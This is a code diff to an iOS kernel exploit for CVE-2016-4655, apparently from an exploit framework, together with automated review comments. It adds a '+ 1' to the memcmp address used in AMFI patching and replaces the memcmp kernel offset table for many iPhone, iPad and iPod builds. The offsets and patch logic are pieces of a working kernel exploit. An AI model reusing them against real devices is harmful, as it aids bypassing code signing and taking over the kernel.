diff --git a/external/source/exploits/CVE-2016-4655/exploit32.c b/external/source/exploits/CVE-2016-4655/exploit32.c
index 688ecae994..83644a4bb2 100644
--- a/external/source/exploits/CVE-2016-4655/exploit32.c
+++ b/external/source/exploits/CVE-2016-4655/exploit32.c
@@ -1263,7 +1263,7 @@ void init_exploit(void * dlsym_addr, void * dlopen_addr)
 amfi_macho = (void*)((uint32_t)amfi_macho - 0x1000);
 }
 
- uint32_t memcmp_what = kernel_start + find_memcmp();
+ uint32_t memcmp_what = kernel_start + find_memcmp() + 1;
 debug_print("memcmp_what %p\n", (void*)(memcmp_what));
 uint32_t amfi_memcmp_off;
 for (amfi_memcmp_off = amfi_macho_start; amfi_memcmp_off < kernel_size; amfi_memcmp_off += 4) {
diff --git a/external/source/exploits/CVE-2016-4655/offsets32.c b/external/source/exploits/CVE-2016-4655/offsets32.c
index 295e572ab0..98ceab6a63 100644
--- a/external/source/exploits/CVE-2016-4655/offsets32.c
+++ b/external/source/exploits/CVE-2016-4655/offsets32.c
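Review bot: A zero return from find_memcmp() is not handled before the added `+ 1` on the memcmp_what line, and the offsets32.c hunk in this same commit makes that return reachable: every *_iOS931 case is gone from its switch and several *_iOS902 cases are commented out, so (if the target_environment enum still defines those values) such targets fall to `default: return 0;`, memcmp_what becomes kernel_start + 1, and the scan loop below searches for that as if it were a real address. A guard such as `if (find_memcmp() == 0) { debug_print("no memcmp offset for this target\n"); return; }` ahead of the assignment would fail fast instead; init_exploit is void per the hunk header, so a bare return is legal, though whether a caller needs an error signal is not visible here. The `+ 1` itself is an unexplained magic constant applied at the call site rather than in the offsets table; a one-line comment stating why the value searched for differs from the raw symbol offset find_memcmp() returns is needed. init_exploit starts and continues outside the hunk.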
@@ -2810,138 +2810,134 @@ static inline unsigned int find_mac_proc_check(void) {
 /*3588 0x000c3c80 0x800c4c80 GLOBAL FUNC 0 _memcmp*/
 static inline unsigned int find_memcmp(void) {
 switch (target_environment) {
- case iPhone41_iOS902: return 0xc3c80;
- case iPhone41_iOS910: return 0xc3c80;
- case iPhone41_iOS920: return 0xc3c80;
- case iPhone41_iOS921: return 0xc3c80;
- case iPhone41_iOS930: return 0xc3c80;
- case iPhone41_iOS931: return 0xc3c80;
- case iPhone41_iOS932: return 0xc3c80;
- case iPhone41_iOS933: return 0xc3c80;
- case iPhone41_iOS934: return 0xc3c80;
- case iPhone51_iOS910: return 0xc3c80;
- case iPhone51_iOS920: return 0xc3c80;
- case iPhone51_iOS921: return 0xc3c80;
- case iPhone51_iOS930: return 0xc3c80;
- case iPhone51_iOS931: return 0xc3c80;
- case iPhone51_iOS932: return 0xc3c80;
- case iPhone51_iOS933: return 0xc3c80;
- case iPhone51_iOS934: return 0xc3c80;
- case iPhone52_iOS902: return 0xc3c80;
- case iPhone52_iOS910: return 0xc3c80;
- case iPhone52_iOS920: return 0xc3c80;
- case iPhone52_iOS921: return 0xc3c80;
- case iPhone52_iOS930: return 0xc3c80;
- case iPhone52_iOS931: return 0xc3c80;
- case iPhone52_iOS932: return 0xc3c80;
- case iPhone52_iOS933: return 0xc3c80;
- case iPhone52_iOS934: return 0xc3c80;
- case iPhone53_iOS910: return 0xc3c80;
- case iPhone53_iOS920: return 0xc3c80;
- case iPhone53_iOS921: return 0xc3c80;
- case iPhone53_iOS930: return 0xc3c80;
- case iPhone53_iOS931: return 0xc3c80;
- case iPhone53_iOS932: return 0xc3c80;
- case iPhone53_iOS933: return 0xc3c80;
- case iPhone53_iOS934: return 0xc3c80;
- case iPhone54_iOS910: return 0xc3c80;
- case iPhone54_iOS920: return 0xc3c80;
- case iPhone54_iOS921: return 0xc3c80;
- case iPhone54_iOS930: return 0xc3c80;
- case iPhone54_iOS931: return 0xc3c80;
- case iPhone54_iOS932: return 0xc3c80;
- case iPhone54_iOS933: return 0xc3c80;
- case iPhone54_iOS934: return 0xc3c80;
- case iPad21_iOS910: return 0xc3c80;
- case iPad21_iOS920: return 0xc3c80;
- case iPad21_iOS921: return 0xc3c80;
- case iPad21_iOS930: return 0xc3c80;
- case iPad21_iOS931: return 0xc3c80;
- case iPad21_iOS932: return 0xc3c80;
- case iPad21_iOS933: return 0xc3c80;
- case iPad21_iOS934: return 0xc3c80;
- case iPad22_iOS910: return 0xc3c80;
- case iPad22_iOS920: return 0xc3c80;
- case iPad22_iOS921: return 0xc3c80;
- case iPad22_iOS930: return 0xc3c80;
- case iPad22_iOS931: return 0xc3c80;
- case iPad22_iOS932: return 0xc3c80;
- case iPad22_iOS933: return 0xc3c80;
- case iPad22_iOS934: return 0xc3c80;
- case iPad23_iOS910: return 0xc3c80;
- case iPad23_iOS920: return 0xc3c80;
- case iPad23_iOS921: return 0xc3c80;
- case iPad23_iOS930: return 0xc3c80;
- case iPad23_iOS931: return 0xc3c80;
- case iPad23_iOS932: return 0xc3c80;
- case iPad23_iOS933: return 0xc3c80;
- case iPad23_iOS934: return 0xc3c80;
- case iPad24_iOS910: return 0xc3c80;
- case iPad24_iOS920: return 0xc3c80;
- case iPad24_iOS921: return 0xc3c80;
- case iPad24_iOS930: return 0xc3c80;
- case iPad24_iOS931: return 0xc3c80;
- case iPad24_iOS932: return 0xc3c80;
- case iPad24_iOS933: return 0xc3c80;
- case iPad24_iOS934: return 0xc3c80;
- case iPad25_iOS902: return 0xc3c80;
- case iPad31_iOS910: return 0xc3c80;
- case iPad31_iOS920: return 0xc3c80;
- case iPad31_iOS921: return 0xc3c80;
- case iPad31_iOS930: return 0xc3c80;
- case iPad31_iOS931: return 0xc3c80;
- case iPad31_iOS932: return 0xc3c80;
- case iPad31_iOS933: return 0xc3c80;
- case iPad31_iOS934: return 0xc3c80;
- case iPad32_iOS910: return 0xc3c80;
- case iPad32_iOS920: return 0xc3c80;
- case iPad32_iOS921: return 0xc3c80;
- case iPad32_iOS930: return 0xc3c80;
- case iPad32_iOS931: return 0xc3c80;
- case iPad32_iOS932: return 0xc3c80;
- case iPad32_iOS933: return 0xc3c80;
- case iPad32_iOS934: return 0xc3c80;
- case iPad33_iOS902: return 0xc3c80;
- case iPad33_iOS910: return 0xc3c80;
- case iPad33_iOS920: return 0xc3c80;
- case iPad33_iOS921: return 0xc3c80;
- case iPad33_iOS930: return 0xc3c80;
- case iPad33_iOS931: return 0xc3c80;
- case iPad33_iOS932: return 0xc3c80;
- case iPad33_iOS933: return 0xc3c80;
- case iPad33_iOS934: return 0xc3c80;
- case iPad34_iOS910: return 0xc3c80;
- case iPad34_iOS920: return 0xc3c80;
- case iPad34_iOS921: return 0xc3c80;
- case iPad34_iOS930: return 0xc3c80;
- case iPad34_iOS931: return 0xc3c80;
- case iPad34_iOS932: return 0xc3c80;
- case iPad34_iOS933: return 0xc3c80;
- case iPad34_iOS934: return 0xc3c80;
- case iPad35_iOS910: return 0xc3c80;
- case iPad35_iOS920: return 0xc3c80;
- case iPad35_iOS921: return 0xc3c80;
- case iPad35_iOS930: return 0xc3c80;
- case iPad35_iOS931: return 0xc3c80;
- case iPad35_iOS932: return 0xc3c80;
- case iPad35_iOS933: return 0xc3c80;
- case iPad35_iOS934: return 0xc3c80;
- case iPad36_iOS910: return 0xc3c80;
- case iPad36_iOS920: return 0xc3c80;
- case iPad36_iOS921: return 0xc3c80;
- case iPad36_iOS930: return 0xc3c80;
- case iPad36_iOS931: return 0xc3c80;
- case iPad36_iOS932: return 0xc3c80;
- case iPad36_iOS933: return 0xc3c80;
- case iPad36_iOS934: return 0xc3c80;
- case iPod51_iOS910: return 0xc3c80;
- case iPod51_iOS920: return 0xc3c80;
- case iPod51_iOS921: return 0xc3c80;
- case iPod51_iOS930: return 0xc3c80;
- case iPod51_iOS931: return 0xc3c80;
- case iPod51_iOS932: return 0xc3c80;
- case iPod51_iOS933: return 0xc3c80;
- case iPod51_iOS934: return 0xc3c80;
+ case iPhone41_iOS934: return 0x000c085c;
+ case iPhone41_iOS933: return 0x000c085c;
+ case iPhone41_iOS932: return 0x000c08ec;
+ case iPhone41_iOS930: return 0x000c08dc;
+ case iPhone41_iOS921: return 0x000bfd7c;
+ case iPhone41_iOS920: return 0x000bfd2c;
+ case iPhone41_iOS910: return 0x000c1340;
+ case iPhone41_iOS902: return 0x000c11d0;
+ case iPhone51_iOS934: return 0x000c3e10;
+ case iPhone51_iOS933: return 0x000c3e10;
+ case iPhone51_iOS932: return 0x000c3c80;
+ case iPhone51_iOS930: return 0x000c3c90;
+ case iPhone51_iOS921: return 0x000c2ff0;
+ case iPhone51_iOS920: return 0x000c2fb0;
+ case iPhone51_iOS910: return 0x000c42c4;
+ /*case iPhone51_iOS902: return 0x000c4124;*/
+ case iPhone52_iOS934: return 0x000c3e10;
+ case iPhone52_iOS933: return 0x000c3e10;
+ case iPhone52_iOS932: return 0x000c3c80;
+ case iPhone52_iOS930: return 0x000c3c90;
+ case iPhone52_iOS921: return 0x000c2ff0;
+ case iPhone52_iOS920: return 0x000c2fb0;
+ case iPhone52_iOS910: return 0x000c42c4;
+ case iPhone52_iOS902: return 0x000c4124;
+ case iPhone53_iOS934: return 0x000c3e10;
+ case iPhone53_iOS933: return 0x000c3e10;
+ case iPhone53_iOS932: return 0x000c3c80;
+ case iPhone53_iOS930: return 0x000c3c90;
+ case iPhone53_iOS921: return 0x000c2ff0;
+ case iPhone53_iOS920: return 0x000c2fb0;
+ case iPhone53_iOS910: return 0x000c42c4;
+ /*case iPhone53_iOS902: return 0x000c4124;*/
+ case iPhone54_iOS934: return 0x000c3e10;
+ case iPhone54_iOS933: return 0x000c3e10;
+ case iPhone54_iOS932: return 0x000c3c80;
+ case iPhone54_iOS930: return 0x000c3c90;
+ case iPhone54_iOS921: return 0x000c2ff0;
+ case iPhone54_iOS920: return 0x000c2fb0;
+ case iPhone54_iOS910: return 0x000c42c4;
+ /*case iPhone54_iOS902: return 0x000c4124;*/
+ case iPad21_iOS934: return 0x000c085c;
+ case iPad21_iOS933: return 0x000c085c;
+ case iPad21_iOS932: return 0x000c08ec;
+ case iPad21_iOS930: return 0x000c08dc;
+ case iPad21_iOS921: return 0x000bfd7c;
+ case iPad21_iOS920: return 0x000bfd2c;
+ case iPad21_iOS910: return 0x000c1340;
+ /*case iPad21_iOS902: return 0x000c11d0;*/
+ case iPad22_iOS934: return 0x000c085c;
+ case iPad22_iOS933: return 0x000c085c;
+ case iPad22_iOS932: return 0x000c08ec;
+ case iPad22_iOS930: return 0x000c08dc;
+ case iPad22_iOS921: return 0x000bfd7c;
+ case iPad22_iOS920: return 0x000bfd2c;
+ case iPad22_iOS910: return 0x000c1340;
+ /*case iPad22_iOS902: return 0x000c11d0;*/
+ case iPad23_iOS934: return 0x000c085c;
+ case iPad23_iOS933: return 0x000c085c;
+ case iPad23_iOS932: return 0x000c08ec;
+ case iPad23_iOS930: return 0x000c08dc;
+ case iPad23_iOS921: return 0x000bfd7c;
+ case iPad23_iOS920: return 0x000bfd2c;
+ case iPad23_iOS910: return 0x000c1340;
+ /*case iPad23_iOS902: return 0x000c11d0;*/
+ case iPad24_iOS934: return 0x000c085c;
+ case iPad24_iOS933: return 0x000c085c;
+ case iPad24_iOS932: return 0x000c08ec;
+ case iPad24_iOS930: return 0x000c08dc;
+ case iPad24_iOS921: return 0x000bfd7c;
+ case iPad24_iOS920: return 0x000bfd2c;
+ case iPad24_iOS910: return 0x000c1340;
+ /*case iPad24_iOS902: return 0x000c11d0;*/
+ case iPad31_iOS934: return 0x000c085c;
+ case iPad31_iOS933: return 0x000c085c;
+ case iPad31_iOS932: return 0x000c08ec;
+ case iPad31_iOS930: return 0x000c08dc;
+ case iPad31_iOS921: return 0x000bfd7c;
+ case iPad31_iOS920: return 0x000bfd2c;
+ case iPad31_iOS910: return 0x000c1340;
+ /*case iPad31_iOS902: return 0x000c11d0;*/
+ case iPad32_iOS934: return 0x000c085c;
+ case iPad32_iOS933: return 0x000c085c;
+ case iPad32_iOS932: return 0x000c08ec;
+ case iPad32_iOS930: return 0x000c08dc;
+ case iPad32_iOS921: return 0x000bfd7c;
+ case iPad32_iOS920: return 0x000bfd2c;
+ case iPad32_iOS910: return 0x000c1340;
+ /*case iPad32_iOS902: return 0x000c11d0;*/
+ case iPad33_iOS934: return 0x000c085c;
+ case iPad33_iOS933: return 0x000c085c;
+ case iPad33_iOS932: return 0x000c08ec;
+ case iPad33_iOS930: return 0x000c08dc;
+ case iPad33_iOS921: return 0x000bfd7c;
+ case iPad33_iOS920: return 0x000bfd2c;
+ case iPad33_iOS910: return 0x000c1340;
+ /*case iPad33_iOS902: return 0x000c11d0;*/
+ case iPad34_iOS934: return 0x000c3e10;
+ case iPad34_iOS933: return 0x000c3e10;
+ case iPad34_iOS932: return 0x000c3c80;
+ case iPad34_iOS930: return 0x000c3c90;
+ case iPad34_iOS921: return 0x000c2ff0;
+ case iPad34_iOS920: return 0x000c2fb0;
+ case iPad34_iOS910: return 0x000c42c4;
+ /*case iPad34_iOS902: return 0x000c4124;*/
+ case iPad35_iOS934: return 0x000c3e10;
+ case iPad35_iOS933: return 0x000c3e10;
+ case iPad35_iOS932: return 0x000c3c80;
+ case iPad35_iOS930: return 0x000c3c90;
+ case iPad35_iOS921: return 0x000c2ff0;
+ case iPad35_iOS920: return 0x000c2fb0;
+ case iPad35_iOS910: return 0x000c42c4;
+ /*case iPad35_iOS902: return 0x000c4124;*/
+ case iPad36_iOS934: return 0x000c3e10;
+ case iPad36_iOS933: return 0x000c3e10;
+ case iPad36_iOS932: return 0x000c3c80;
+ case iPad36_iOS930: return 0x000c3c90;
+ case iPad36_iOS921: return 0x000c2ff0;
+ case iPad36_iOS920: return 0x000c2fb0;
+ case iPad36_iOS910: return 0x000c42c4;
+ /*case iPad36_iOS902: return 0x000c4124;*/
+ case iPod51_iOS934: return 0x000c085c;
+ case iPod51_iOS933: return 0x000c085c;
+ case iPod51_iOS932: return 0x000c08ec;
+ case iPod51_iOS930: return 0x000c08dc;
+ case iPod51_iOS921: return 0x000bfd7c;
+ case iPod51_iOS920: return 0x000bfd2c;
+ case iPod51_iOS910: return 0x000c1340;
+ /*case iPod51_iOS902: return 0x000c11d0;*/
 default: return 0;
 }
 }
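Review bot: The header comment `/*3588 0x000c3c80 0x800c4c80 GLOBAL FUNC 0 _memcmp*/` above find_memcmp() is now stale: it quotes the one value the old table returned for every target, while the new table returns a different value per kernel build, so it should either be dropped or reworded to say which build it was taken from. The commented-out *_iOS902 cases and the disappearance of every *_iOS931 case (and of iPad25_iOS902) both silently end at `default: return 0;`, and nothing in the hunk says whether that is deliberate; a one-line comment above the first disabled case, along the lines of `/* 9.0.2 entries below are disabled pending verified offsets; 0 means unsupported to the caller */` adjusted to the real reason, would stop the next reader from re-enabling them by accident. Listing the cases newest-first, where the removed lines and presumably the sibling find_* tables go oldest-first, is a style inconsistency worth settling one way across the file.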